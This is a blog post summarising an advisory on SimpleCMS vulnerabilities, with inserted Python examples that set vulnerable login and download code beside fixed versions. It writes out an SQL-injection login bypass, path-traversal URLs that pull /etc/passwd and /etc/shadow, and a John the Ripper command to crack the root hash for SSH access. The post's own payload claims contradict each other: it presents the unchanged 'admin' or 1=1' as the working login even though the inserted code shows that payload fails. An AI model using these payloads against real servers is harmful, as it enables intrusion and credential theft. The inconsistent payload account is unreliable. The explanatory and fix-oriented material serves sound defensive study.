Simple CMS – when things can go really wrong

On 28 March, Bugtraq published an advisory describing multiple vulnerabilities in the SimpleCMS content management system.

The first is that the page admin/application/plugins/scaffold/index.php is vulnerable to cross-site scripting (XSS).

The second is an SQL injection in the login form that lets an attacker log in to the administrator section without knowing a password. Submitting the following credentials (the username is shown here exactly as the error below proves it reached MySQL):

user: admin' or 1=1
pass: password

produces the following error:

SELECT * FROM accounts WHERE username ='admin' or 1=1' and password ='9f6e6800cfae7749eb6c486619254b9c':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and password ='9f6e6800cfae7749eb6c486619254b9c'' at line 1

The error discloses the whole query: the username is inserted between single quotes and is followed by and password ='<hash>'. Knowing that shape, the attacker only has to adjust the quoting of the payload so the statement stays syntactically valid while the injected condition is always true, and can then log in to the administration section with full access:

user: admin' or 1=1
pass: password
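To make the mechanics concrete, here is an added example that is not part of the original post or of SimpleCMS. It rebuilds the query in the shape the error message above reveals, using SQLite in memory instead of MySQL; the accounts table layout and the MD5 password hashing are assumptions. The first payload reproduces the syntax error, and the balanced payload `admin' or '1'='1` (the standard quote-balancing technique, not a payload given on the page) bypasses the check. The parameterised version shows the fix.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed fixture: an `accounts` table with one admin row (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    secret = hashlib.md5(b"s3cret-unknown-to-attacker").hexdigest()
    conn.execute("INSERT INTO accounts VALUES (?, ?)", ("admin", secret))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String-concatenated query in the exact shape the CMS error message shows.

    Returns ("error", message, sql) when the database rejects the statement,
    or ("ok", logged_in, sql) otherwise.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()   # assumption: MD5
    sql = f"SELECT * FROM accounts WHERE username ='{username}' and password ='{pw_hash}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # This is the branch that leaks the query to the attacker on the real site.
        return ("error", str(exc), sql)
    return ("ok", row is not None, sql)


def safe_login(conn, username, password):
    """Parameterised query: the username is data, never SQL, whatever it contains."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT * FROM accounts WHERE username = ? and password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # Unbalanced quote: database error, as seen on the SimpleCMS login page.
    print(vulnerable_login(db, "admin' or 1=1", "password"))
    # Balanced quotes: `username ='admin' or '1'='1' and password ='...'`
    # parses as username='admin' OR ('1'='1' AND password=...), so the admin row is returned.
    print(vulnerable_login(db, "admin' or '1'='1", "password"))
    # Same payloads against the parameterised query are plain strings and fail.
    print(safe_login(db, "admin' or '1'='1", "password"))
```

Note that the bypass works without the attacker ever knowing the stored hash: operator precedence makes the OR swallow the password comparison. The same precedence applies in MySQL, so the behaviour matches what the advisory describes.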

The most dangerous is the third: a path traversal in the admin download action that lets the attacker read arbitrary files from the server.

By requesting http://simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=&section=pages
and http://simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/shadow&page=&section=pages1
the attacker retrieves /etc/passwd and /etc/shadow. The download_file parameter is joined onto the download directory and opened without checking where the resulting path ends up, so the ../ sequences walk out of the web root; extra ../ beyond the filesystem root are harmless, which is why a long chain works without knowing the exact depth. Note that /etc/shadow is normally readable only by root, so the second request only succeeds if the web server runs as root or the file's permissions have been loosened.
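The following is an added example, not SimpleCMS code, showing the traversal bug beside its fix. It builds a throwaway directory tree (constructed fixture) in which site/files is the intended download directory and a sibling etc/passwd stands in for a file outside it. The function names and the fixture layout are assumptions; the hardened version canonicalises the path with realpath and refuses anything that does not stay under the base directory.

```python
import os
import tempfile


def build_fixture():
    """Constructed fixture: <root>/site/files is the download directory,
    <root>/etc/passwd is a file that must never be served. Returns files dir."""
    root = tempfile.mkdtemp()
    files_dir = os.path.join(root, "site", "files")
    os.makedirs(files_dir)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(files_dir, "brochure.txt"), "w") as f:
        f.write("public brochure")
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed sample line
    return files_dir


def vulnerable_download(files_dir, download_file):
    """Mirrors the bug: user input is glued onto the base directory and opened
    with no check on where the joined path actually resolves."""
    path = os.path.join(files_dir, download_file)
    with open(path, "rb") as f:
        return f.read()


def is_safe_path(files_dir, download_file):
    """True only if the resolved target stays inside the resolved base directory.

    realpath collapses `..` and follows symlinks; commonpath catches both
    traversal and absolute paths (os.path.join discards the base for those).
    """
    base = os.path.realpath(files_dir)
    target = os.path.realpath(os.path.join(base, download_file))
    return os.path.commonpath([base, target]) == base


def safe_download(files_dir, download_file):
    """Hardened handler: reject the request before touching the filesystem."""
    if not is_safe_path(files_dir, download_file):
        raise PermissionError(f"refusing to serve {download_file!r}")
    target = os.path.realpath(os.path.join(files_dir, download_file))
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    d = build_fixture()
    print(vulnerable_download(d, "../../etc/passwd"))   # leaks the outside file
    print(safe_download(d, "brochure.txt"))              # legitimate download
    print(is_safe_path(d, "../../etc/passwd"))           # False: blocked
```

Two `../` suffice here because the fixture is only two levels deep; against a real server the attacker pads the chain, as in the advisory's URLs, because climbing past / is a no-op. A further hardening step that is independent of path checks is to run the web server as an unprivileged user so that a traversal that does slip through cannot read /etc/shadow.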

Using John the Ripper, by running

$ unshadow passwd shadow > mypasswd && john --users=root mypasswd

the root password hash from the host is attacked offline (unshadow merges the two files so that the hash from /etc/shadow sits in the password field of the corresponding /etc/passwd entry). If the password is weak enough to crack, the attacker can then SSH into the hosting system as root, provided the server permits password-based root logins.

At the time of writing there were no vendor-supplied patches for these vulnerabilities.


About Stefan Fodor

inscription on a tombstone
This entry was posted in IT Security, Week 13.
